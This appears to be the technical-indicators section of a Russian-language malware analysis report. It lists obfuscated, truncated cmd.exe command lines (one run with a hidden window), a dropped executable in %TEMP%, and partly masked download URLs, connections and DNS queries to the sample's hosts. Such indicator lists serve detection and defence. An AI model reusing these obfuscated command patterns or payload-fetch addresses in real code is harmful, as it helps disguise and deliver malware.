Техническая информация
- '<SYSTEM32>\cmd.exe' /c CMd /v: /c " sEt '{@]=\_\_---/-\_\/_/ //\_-_-\\\--/__ -/_/_\-\--\//_\ \//_-\-_\/_-/-\ -\_\-/-_//\_-_/ \/_///_\_---_-\ /\_-_-_/--\_/\\ \-\\//__/-/-_\- \/\/_\/_-\/-__- -...
- %TEMP%\986.exe
- 'up##.com.tw':80
- 'at###co.com.vn':80
- 'at###co.com.vn':443
- 'it####uage.co.uk':80
- http://up##.com.tw/GS0Rb4K
- http://at###co.com.vn/cdQ7vX
- http://it####uage.co.uk/am
- 'at###co.com.vn':443
- DNS ASK oc####gactors.com
- DNS ASK ba##e.org
- DNS ASK up##.com.tw
- DNS ASK at###co.com.vn
- DNS ASK it####uage.co.uk
- '<SYSTEM32>\cmd.exe' /c CMd /v: /c " sEt '{@]=\_\_---/-\_\/_/ //\_-_-\\\--/__ -/_/_\-\--\//_\ \//_-\-_\/_-/-\ -\_\-/-_//\_-_/ \/_///_\_---_-\ /\_-_-_/--\_/\\ \-\\//__/-/-_\- \/\/_\/_-\/-__- -...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /v: /c " sEt '{@]=\_\_---/-\_\/_/ //\_-_-\\\--/__ -/_/_\-\--\//_\ \//_-\-_\/_-/-\ -\_\-/-_//\_-_/ \/_///_\_---_-\ /\_-_-_/--\_/\\ \-\\//__/-/-_\- \/\/_\/_-\/-__- -_-\/\\_-_///\- //-__--...